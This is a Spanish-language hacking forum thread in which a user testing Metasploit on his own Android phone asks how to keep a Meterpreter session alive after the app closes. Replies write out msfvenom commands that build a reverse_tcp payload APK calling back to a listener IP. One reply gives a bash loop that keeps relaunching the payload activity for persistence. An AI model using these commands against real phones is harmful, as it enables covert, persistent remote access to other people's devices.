Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOLUCIONADO] Ayuda con payload

  • 6 Respuestas
  • 397 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado sombra1234

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
« en: Enero 02, 2019, 05:56:50 pm »
Buenas, oyer me puse a probar payloads de metasploit contra mi telefono andorid, al instalar el payload y darme sesion en meterpreter me di cuenta de que solo tengo la session activa cuando tengo la app abierta si la cierro se me quita la conexion, la cosa es que si habia alguna forma de tener tener la session abierta aun con la app cerrada
« Última modificación: Enero 02, 2019, 07:54:54 pm por Gabriela »

Desconectado Dragora

  • *
  • Colaborador
  • *
  • Mensajes: 128
  • Actividad:
    68.33%
  • Reputación 7
  • La resistencia es inútil, serás absorbido.
    • Ver Perfil
« Respuesta #1 en: Enero 02, 2019, 06:51:09 pm »
Por lo que entiendo, tu quieres conseguir una shell remota infectando a un android con un payload lo puedes generar con msfvenom por tanto intuyo que la aplicación/payload se crea correctamente, y luego, pones a la escucha (con el comando "use multi/handler") y si has puesto bien los puertos y todo, pues te agarrará una meterpreter, pues tu lo que quieres es a  traves de la meterpreter conseguir una shell remota?
si es eso solo tienes que escirbir en la meterpreter el comando "shell", y ya esta, navegas por el android  victima con comandos linux y ya esta.

ahora bien, si ese no es es problema, entonces es con el msfvenom, cuando creas el payload?


Ejemplo:

el comando: "msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk" pienso que esta mal, ya que añades la plataforma dos veces, la correcta sería:

"msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.... lport=4444 R> /root/Escritorio/payload.apk"


Espero te sirva.

Marcado como mejor respuesta por: sombra1234 en Enero 02, 2019, 07:11:50 pm

Desconectado Mortal_Poison

  • *
  • Colaborador
  • *
  • Mensajes: 152
  • Actividad:
    0%
  • Reputación 15
  • Become the change you seek in the world. -Gandhi.
    • Ver Perfil
    • VIINACADEMY
  • Twitter: https://www.twitter.com/Mortal_Poison_
« Respuesta #2 en: Enero 02, 2019, 07:00:06 pm »
Buenas tardes sombra1234,

Como sabemos, la migración de procesos no funciona de igual forma en Android que en Windows. Por tanto, estoy suponiendo que ya tienes una session meterpreter con el objetivo y por tanto, deberás crear un .sh para posteriormente subirlo al teléfono Android y que se esté ejecutando de manera constante:

Script 'popular' usado para ello:
Código: Bash
  1. #!/bin/bash
  2. while :
  3. do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
  4. sleep 20
  5. done

Donde deberías poner el paquete y la activity del .apk que tienes(AndroidManifest.xml).

Un saludo.
« Última modificación: Enero 02, 2019, 07:20:20 pm por Mortal_Poison »
Become the change you seek in the world. -Gandhi.


Desconectado sombra1234

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Enero 02, 2019, 07:13:01 pm »
Eso es lo que buscaba @Mortal_Poison tienes alguna pagina o pdf que me explique un poco mas donde hay que colocarlo y eso, muchas gracias por la informacion

Desconectado sombra1234

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Enero 02, 2019, 07:13:39 pm »
Muchas gracias @Dragora por la respuesta

Desconectado Mortal_Poison

  • *
  • Colaborador
  • *
  • Mensajes: 152
  • Actividad:
    0%
  • Reputación 15
  • Become the change you seek in the world. -Gandhi.
    • Ver Perfil
    • VIINACADEMY
  • Twitter: https://www.twitter.com/Mortal_Poison_
« Respuesta #5 en: Enero 02, 2019, 07:19:22 pm »
@sombra1234 puedes revisar más en éste enlace. Él tiene una apk que descompilo anteriormente. Si quizás no conoces cómo hacerlo, puedes revisar éste post de Underc0de donde se enseña cómo hacerlo.


Un saludo.
Become the change you seek in the world. -Gandhi.


Desconectado sombra1234

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #6 en: Enero 02, 2019, 07:32:56 pm »
@Mortal_Poison Muchas gracias por la informacion! Ya me has solucionado mi duda

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 11115
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 2574
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] ¿Como publicar un software como software libre?

Iniciado por FuriosoJack

Respuestas: 2
Vistas: 1969
Último mensaje Mayo 23, 2017, 07:24:22 am
por HATI
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 3769
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Problem al instalar Windows "cualquier windows"

Iniciado por Made

Respuestas: 7
Vistas: 3397
Último mensaje Septiembre 03, 2012, 04:53:08 pm
por Made